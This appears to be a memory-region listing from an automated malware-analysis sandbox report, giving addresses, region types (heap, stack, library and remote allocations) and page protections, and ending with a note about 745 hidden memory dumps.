1FD20727000
heap
page read and write
6989000
trusted library allocation
page read and write
315A000
trusted library allocation
page read and write
1FD21F90000
heap
page read and write
1537000
heap
page read and write
7730000
trusted library allocation
page read and write
11698C1F000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
116963C1000
trusted library allocation
page read and write
354A000
trusted library allocation
page read and write
1FD20726000
heap
page read and write
30FA000
trusted library allocation
page read and write
7919000
heap
page read and write
25F6CEAD000
heap
page read and write
348A000
trusted library allocation
page read and write
25F6EB80000
heap
page read and write
25F6CE81000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
11699F8B000
trusted library allocation
page read and write
158A90A6000
trusted library allocation
page read and write
1FD20732000
heap
page read and write
1FD2071A000
heap
page read and write
158A7185000
heap
page read and write
7FF7D6FDC000
unkown
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
158C1187000
heap
page read and write
588C000
heap
page read and write
158C15C0000
heap
page read and write
78D9000
heap
page read and write
1FD20727000
heap
page read and write
5967000
heap
page read and write
4124000
trusted library allocation
page read and write
1FD20727000
heap
page read and write
158C10B0000
heap
page read and write
3FE9000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
1169B6FF000
trusted library allocation
page read and write
125E000
stack
page read and write
13F5000
heap
page read and write
1FD20948000
heap
page read and write
158A8FC2000
trusted library allocation
page read and write
FA31FE000
stack
page read and write
1400000
trusted library allocation
page read and write
40BF000
trusted library allocation
page read and write
158A7300000
heap
page read and write
6CFC000
stack
page read and write
158A8F9C000
trusted library allocation
page read and write
3531000
trusted library allocation
page read and write
116963F7000
trusted library allocation
page read and write
1FD20722000
heap
page read and write
69DE000
trusted library allocation
page read and write
21B9EFE000
stack
page read and write
1FD206F7000
heap
page read and write
7AB5000
trusted library allocation
page read and write
4075000
trusted library allocation
page read and write
7709000
trusted library allocation
page read and write
7B6F000
stack
page read and write
116963FB000
trusted library allocation
page read and write
71E27B000
stack
page read and write
7FF7D6FDE000
unkown
page readonly
78F2000
heap
page read and write
116A62CB000
trusted library allocation
page read and write
25F6CEBB000
heap
page read and write
1FD20754000
heap
page read and write
2FA0000
trusted library allocation
page read and write
33D3000
trusted library allocation
page read and write
116A7E02000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
34E5000
trusted library allocation
page read and write
158A8CC4000
trusted library allocation
page read and write
30F2000
trusted library allocation
page read and write
116A5FF3000
trusted library allocation
page read and write
116A7E44000
trusted library allocation
page read and write
1FD223D3000
heap
page read and write
3540000
trusted library allocation
page read and write
5ABE000
stack
page read and write
416D000
trusted library allocation
page read and write
1FD223DE000
heap
page read and write
FA343A000
stack
page read and write
7936000
heap
page read and write
116A62C2000
trusted library allocation
page read and write
1FD223FC000
heap
page read and write
116963CF000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
80AE000
stack
page read and write
69BB000
trusted library allocation
page read and write
1169468B000
heap
page read and write
158C10FC000
heap
page read and write
412F000
trusted library allocation
page read and write
116963C7000
trusted library allocation
page read and write
21BA5FE000
stack
page read and write
14C9000
heap
page read and write
316D000
trusted library allocation
page read and write
1169463D000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
341A000
trusted library allocation
page read and write
41AE000
trusted library allocation
page read and write
116A6042000
trusted library allocation
page read and write
54C1000
trusted library allocation
page read and write
7FFD9B941000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
3FF0000
trusted library allocation
page read and write
25F6CEC3000
heap
page read and write
62BE000
stack
page read and write
58C2000
heap
page read and write
7FFD9B876000
trusted library allocation
page execute and read and write
1169781F000
trusted library allocation
page read and write
158A8BE2000
trusted library allocation
page read and write
1FD223E6000
heap
page read and write
3578000
trusted library allocation
page read and write
116A7F2A000
trusted library allocation
page read and write
6B10000
trusted library allocation
page execute and read and write
FA410E000
stack
page read and write
34FE000
trusted library allocation
page read and write
1FD20786000
heap
page read and write
7AAF000
trusted library allocation
page read and write
35B1000
trusted library allocation
page read and write
7A92000
trusted library allocation
page read and write
31AE000
trusted library allocation
page read and write
14F6000
heap
page read and write
13ED000
trusted library allocation
page execute and read and write
40DE000
trusted library allocation
page read and write
6C60000
heap
page execute and read and write
3412000
trusted library allocation
page read and write
7FF7D6FD0000
unkown
page readonly
7FF7D6FDE000
unkown
page readonly
71DDFF000
stack
page read and write
71DE7E000
stack
page read and write
7AC0000
trusted library allocation
page read and write
353C000
trusted library allocation
page read and write
25F6D07A000
heap
page read and write
2DEE000
stack
page read and write
158A70E0000
heap
page read and write
4155000
trusted library allocation
page read and write
116A6295000
trusted library allocation
page read and write
6A10000
trusted library allocation
page read and write
FA35BE000
stack
page read and write
1FD2072E000
heap
page read and write
1FD2094D000
heap
page read and write
4167000
trusted library allocation
page read and write
1402000
trusted library allocation
page read and write
1440000
heap
page read and write
6880000
trusted library allocation
page execute and read and write
4086000
trusted library allocation
page read and write
1169ADBA000
trusted library allocation
page read and write
31D2000
trusted library allocation
page read and write
3556000
trusted library allocation
page read and write
1169BBE2000
trusted library allocation
page read and write
5971000
heap
page read and write
7FAE000
stack
page read and write
1FD20754000
heap
page read and write
791D000
heap
page read and write
13BE000
stack
page read and write
4107000
trusted library allocation
page read and write
158A8BE7000
trusted library allocation
page read and write
25F6CE40000
heap
page read and write
31BE000
trusted library allocation
page read and write
4101000
trusted library allocation
page read and write
11695FD1000
trusted library allocation
page read and write
67FE000
stack
page read and write
4054000
trusted library allocation
page read and write
4003000
trusted library allocation
page read and write
25F6CEAE000
heap
page read and write
7964000
heap
page read and write
33C8000
trusted library allocation
page read and write
158A71FC000
heap
page read and write
5500000
trusted library allocation
page read and write
158A71BA000
heap
page read and write
158A71B4000
heap
page read and write
68A0000
trusted library allocation
page execute and read and write
DD0000
heap
page read and write
158C10A0000
heap
page execute and read and write
340F000
trusted library allocation
page read and write
116961F8000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
583E000
stack
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1FD2073F000
heap
page read and write
25F6CE20000
heap
page read and write
21BA7FB000
stack
page read and write
1169641F000
trusted library allocation
page read and write
25F6D075000
heap
page read and write
25F6EB83000
heap
page read and write
30E0000
trusted library allocation
page read and write
317B000
trusted library allocation
page read and write
40C5000
trusted library allocation
page read and write
158A8BFC000
trusted library allocation
page read and write
158A71B6000
heap
page read and write
1417000
trusted library allocation
page execute and read and write
6F3E000
stack
page read and write
7FFD9B840000
trusted library allocation
page read and write
25F6CE8D000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
25F6CEB2000
heap
page read and write
1169ADE3000
trusted library allocation
page read and write
6987000
trusted library allocation
page read and write
6A40000
trusted library allocation
page read and write
515C000
stack
page read and write
11694645000
heap
page read and write
35D6000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page execute and read and write
3542000
trusted library allocation
page read and write
3474000
trusted library allocation
page read and write
4119000
trusted library allocation
page read and write
1169821F000
trusted library allocation
page read and write
13C0000
trusted library allocation
page read and write
1FD223D1000
heap
page read and write
40E0000
trusted library allocation
page read and write
158A8BAD000
trusted library allocation
page read and write
5580000
trusted library allocation
page read and write
158A717C000
heap
page read and write
340C000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
413C000
trusted library allocation
page read and write
FA2DEE000
stack
page read and write
446000
remote allocation
page execute and read and write
597E000
heap
page read and write
78C3000
heap
page read and write
31C6000
trusted library allocation
page read and write
6A05000
trusted library allocation
page read and write
5A7E000
stack
page read and write
34CB000
trusted library allocation
page read and write
3FF5000
trusted library allocation
page read and write
34A0000
trusted library allocation
page read and write
1260000
heap
page read and write
3182000
trusted library allocation
page read and write
3FFF000
trusted library allocation
page read and write
408C000
trusted library allocation
page read and write
11696E1F000
trusted library allocation
page read and write
1FD20722000
heap
page read and write
1FD20948000
heap
page read and write
158A90E1000
trusted library allocation
page read and write
158C1040000
heap
page execute and read and write
78E1000
heap
page read and write
40CC000
trusted library allocation
page read and write
1FD20780000
heap
page read and write
347F000
trusted library allocation
page read and write
12B0000
heap
page read and write
1FD20702000
heap
page read and write
158B8C02000
trusted library allocation
page read and write
34CD000
trusted library allocation
page read and write
31E7000
trusted library allocation
page read and write
11694590000
heap
page read and write
7B2D000
stack
page read and write
158A7201000
heap
page read and write
158A9236000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
FA428B000
stack
page read and write
7ABA000
trusted library allocation
page read and write
54C6000
trusted library allocation
page read and write
116945F0000
heap
page read and write
5590000
trusted library allocation
page execute and read and write
324B000
trusted library allocation
page read and write
71E0FE000
stack
page read and write
5850000
trusted library allocation
page read and write
1FD206B0000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
FA34BB000
stack
page read and write
150B000
heap
page read and write
116963D3000
trusted library allocation
page read and write
21BA6FE000
stack
page read and write
5570000
heap
page read and write
FA363E000
stack
page read and write
158A7165000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1FD20948000
heap
page read and write
FA30FA000
stack
page read and write
78BF000
heap
page read and write
1FD20754000
heap
page read and write
158A8F65000
trusted library allocation
page read and write
158A6FA0000
heap
page read and write
58DA000
heap
page read and write
FA317E000
stack
page read and write
7FFD9B930000
trusted library allocation
page read and write
3433000
trusted library allocation
page read and write
7BEE000
stack
page read and write
158A9240000
trusted library allocation
page read and write
1FD20721000
heap
page read and write
25F6CE85000
heap
page read and write
3467000
trusted library allocation
page read and write
FA32F9000
stack
page read and write
7B80000
trusted library allocation
page read and write
33D0000
trusted library allocation
page read and write
40E8000
trusted library allocation
page read and write
116A62AD000
trusted library allocation
page read and write
6A0B000
trusted library allocation
page read and write
31B8000
trusted library allocation
page read and write
1415000
trusted library allocation
page execute and read and write
1169AC67000
trusted library allocation
page read and write
78A8000
heap
page read and write
158B8B91000
trusted library allocation
page read and write
116A7F10000
trusted library allocation
page read and write
6C90000
trusted library allocation
page execute and read and write
71DD7F000
stack
page read and write
60D2000
heap
page read and write
5880000
heap
page read and write
158A7170000
heap
page read and write
158B8BA0000
trusted library allocation
page read and write
6F7E000
stack
page read and write
7790000
heap
page read and write
1FD2073E000
heap
page read and write
1169ACFC000
trusted library allocation
page read and write
158A8F73000
trusted library allocation
page read and write
158A7080000
heap
page read and write
6A90000
trusted library allocation
page read and write
25F71062000
heap
page read and write
1FD2073F000
heap
page read and write
4174000
trusted library allocation
page read and write
4186000
trusted library allocation
page read and write
76F6000
trusted library allocation
page read and write
1169A611000
trusted library allocation
page read and write
13D3000
trusted library allocation
page execute and read and write
1FD223DB000
heap
page read and write
25F6CE8D000
heap
page read and write
1169A60F000
trusted library allocation
page read and write
1FD20737000
heap
page read and write
40D0000
trusted library allocation
page read and write
71DA73000
stack
page read and write
25F6CEB2000
heap
page read and write
343B000
trusted library allocation
page read and write
1169A162000
trusted library allocation
page read and write
116A7DBB000
trusted library allocation
page read and write
1FD223D6000
heap
page read and write
7FF7D6FD1000
unkown
page execute read
328A000
trusted library allocation
page read and write
2F80000
trusted library allocation
page read and write
158C10B4000
heap
page read and write
158A8CC1000
trusted library allocation
page read and write
11695FC0000
heap
page execute and read and write
3154000
trusted library allocation
page read and write
7FFD9B972000
trusted library allocation
page read and write
1169AA9A000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
33DF000
trusted library allocation
page read and write
40DA000
trusted library allocation
page read and write
34D7000
trusted library allocation
page read and write
790D000
heap
page read and write
1FD206D8000
heap
page read and write
54F0000
trusted library allocation
page read and write
7FF7D6FD1000
unkown
page execute read
1FD2071A000
heap
page read and write
158A8CC7000
trusted library allocation
page read and write
1FD223EA000
heap
page read and write
4FC0000
trusted library allocation
page read and write
40A0000
trusted library allocation
page read and write
76F3000
trusted library allocation
page read and write
4160000
trusted library allocation
page read and write
158A8B91000
trusted library allocation
page read and write
FA327E000
stack
page read and write
154C000
heap
page read and write
FFA5DEE000
stack
page read and write
7895000
heap
page read and write
1169AE15000
trusted library allocation
page read and write
3FE2000
trusted library allocation
page read and write
14F2000
heap
page read and write
25F6EDA0000
trusted library allocation
page read and write
54E8000
trusted library allocation
page read and write
1FD2071A000
heap
page read and write
2F90000
trusted library allocation
page read and write
1169AD73000
trusted library allocation
page read and write
1493000
heap
page read and write
40B8000
trusted library allocation
page read and write
25F6CEB0000
heap
page read and write
6A30000
trusted library allocation
page read and write
2F2F000
stack
page read and write
158A8D00000
trusted library allocation
page read and write
30EF000
trusted library allocation
page read and write
30EC000
trusted library allocation
page read and write
4113000
trusted library allocation
page read and write
1FD223EA000
heap
page read and write
34DA000
trusted library allocation
page read and write
1FD223EA000
heap
page read and write
116A8144000
trusted library allocation
page read and write
FA2CE3000
stack
page read and write
25F6CEC3000
heap
page read and write
FA420B000
stack
page read and write
7FFD9B84C000
trusted library allocation
page execute and read and write
7907000
heap
page read and write
158C1194000
heap
page read and write
78D2000
heap
page read and write
11695F50000
heap
page read and write
3400000
trusted library allocation
page read and write
1FD2079C000
heap
page read and write
1169465F000
heap
page read and write
1FD223EA000
heap
page read and write
158C1180000
heap
page read and write
31BB000
trusted library allocation
page read and write
34F0000
trusted library allocation
page read and write
408A000
trusted library allocation
page read and write
116A808F000
trusted library allocation
page read and write
1FD2072E000
heap
page read and write
116A7E1C000
trusted library allocation
page read and write
3FFC000
trusted library allocation
page read and write
158A8FD4000
trusted library allocation
page read and write
1FD2073F000
heap
page read and write
6975000
trusted library allocation
page read and write
158A726B000
heap
page read and write
1169A149000
trusted library allocation
page read and write
592A000
heap
page read and write
3157000
trusted library allocation
page read and write
25F6CEC3000
heap
page read and write
1FD2073A000
heap
page read and write
6E3E000
stack
page read and write
7ABF000
trusted library allocation
page read and write
158A7208000
heap
page read and write
1169947F000
trusted library allocation
page read and write
116A6CCB000
trusted library allocation
page read and write
158C10FA000
heap
page read and write
1FD20540000
heap
page read and write
4068000
trusted library allocation
page read and write
1FD2071A000
heap
page read and write
11699F01000
trusted library allocation
page read and write
6C80000
trusted library allocation
page read and write
321D000
trusted library allocation
page read and write
3471000
trusted library allocation
page read and write
404E000
trusted library allocation
page read and write
79B5000
heap
page read and write
1FD20940000
heap
page read and write
5582000
trusted library allocation
page read and write
76EC000
stack
page read and write
145B000
heap
page read and write
6C30000
trusted library allocation
page read and write
1FD2094E000
heap
page read and write
1169ADC7000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
1169463F000
heap
page read and write
7AAA000
trusted library allocation
page read and write
FFA607E000
stack
page read and write
7890000
heap
page read and write
25F6CE88000
heap
page read and write
25F6CE60000
heap
page read and write
11694643000
heap
page read and write
7BAE000
trusted library allocation
page read and write
158A71C0000
heap
page read and write
1169B7CC000
trusted library allocation
page read and write
71DCFE000
stack
page read and write
35CA000
trusted library allocation
page read and write
13D0000
trusted library allocation
page read and write
71DEFE000
stack
page read and write
158C115C000
heap
page read and write
7F2E000
stack
page read and write
1169AAC0000
trusted library allocation
page read and write
3505000
trusted library allocation
page read and write
D69000
stack
page read and write
7A99000
trusted library allocation
page read and write
32C9000
trusted library allocation
page read and write
1FD2073B000
heap
page read and write
1FD20764000
heap
page read and write
1FD206D9000
heap
page read and write
2F6B000
stack
page read and write
1FD223D1000
heap
page read and write
DE0000
heap
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
432000
remote allocation
page execute and read and write
7FFD9B794000
trusted library allocation
page read and write
3223000
trusted library allocation
page read and write
116948B0000
trusted library allocation
page read and write
FA33B7000
stack
page read and write
76F0000
trusted library allocation
page read and write
1FD223EA000
heap
page read and write
3425000
trusted library allocation
page read and write
1FD2073F000
heap
page read and write
1FD20791000
heap
page read and write
54CD000
trusted library allocation
page read and write
158A725D000
heap
page read and write
158A73E0000
heap
page read and write
121E000
stack
page read and write
6A0E000
trusted library allocation
page read and write
54AB000
trusted library allocation
page read and write
1169BE92000
trusted library allocation
page read and write
1450000
heap
page read and write
7950000
heap
page read and write
116A811D000
trusted library allocation
page read and write
322B000
trusted library allocation
page read and write
33C2000
trusted library allocation
page read and write
141B000
trusted library allocation
page execute and read and write
32C1000
trusted library allocation
page read and write
4132000
trusted library allocation
page read and write
6DFC000
stack
page read and write
13E0000
trusted library allocation
page read and write
7FFD9B944000
trusted library allocation
page read and write
3FC1000
trusted library allocation
page read and write
314A000
trusted library allocation
page read and write
1406000
trusted library allocation
page execute and read and write
158A8BE5000
trusted library allocation
page read and write
1FD2072E000
heap
page read and write
11696057000
trusted library allocation
page read and write
71DBFE000
stack
page read and write
31DF000
trusted library allocation
page read and write
69D2000
trusted library allocation
page read and write
3113000
trusted library allocation
page read and write
158A70A0000
heap
page read and write
1FD20754000
heap
page read and write
7FFD9B792000
trusted library allocation
page read and write
1FD223E6000
heap
page read and write
71DC7C000
stack
page read and write
1FD20731000
heap
page read and write
5550000
heap
page read and write
21B9FFE000
stack
page read and write
116945F6000
heap
page read and write
1FD223D4000
heap
page read and write
11695F10000
trusted library allocation
page read and write
58E0000
heap
page read and write
2F70000
trusted library allocation
page execute and read and write
593C000
heap
page read and write
6980000
trusted library allocation
page read and write
69B0000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
40B3000
trusted library allocation
page read and write
6F93000
trusted library allocation
page read and write
5873000
heap
page execute and read and write
7724000
trusted library allocation
page read and write
11695F00000
heap
page readonly
7F6F000
stack
page read and write
1FD2071F000
heap
page read and write
1FD20945000
heap
page read and write
78AE000
heap
page read and write
FFA617F000
stack
page read and write
116948E4000
heap
page read and write
40AD000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
FA2D6E000
stack
page read and write
FA36BE000
stack
page read and write
158A73ED000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
31AC000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1270000
heap
page read and write
116948E0000
heap
page read and write
158A726E000
heap
page read and write
5976000
heap
page read and write
3211000
trusted library allocation
page read and write
1169B58C000
trusted library allocation
page read and write
25F6CE10000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
3465000
trusted library allocation
page read and write
5AFE000
stack
page read and write
5930000
heap
page read and write
7720000
trusted library allocation
page read and write
FA353E000
stack
page read and write
4052000
trusted library allocation
page read and write
633E000
stack
page read and write
1FD20754000
heap
page read and write
5870000
heap
page execute and read and write
69C6000
trusted library allocation
page read and write
10F7000
stack
page read and write
25F6CEB0000
heap
page read and write
35BC000
trusted library allocation
page read and write
78CD000
heap
page read and write
65FE000
stack
page read and write
158A8C2E000
trusted library allocation
page read and write
25F70E62000
heap
page read and write
1FD20722000
heap
page read and write
552E000
trusted library allocation
page read and write
1FD20729000
heap
page read and write
21B9B2A000
stack
page read and write
13D4000
trusted library allocation
page read and write
158A8FB0000
trusted library allocation
page read and write
116963C3000
trusted library allocation
page read and write
437000
remote allocation
page execute and read and write
54BE000
trusted library allocation
page read and write
697A000
trusted library allocation
page read and write
There are 745 hidden memdumps, click here to show them.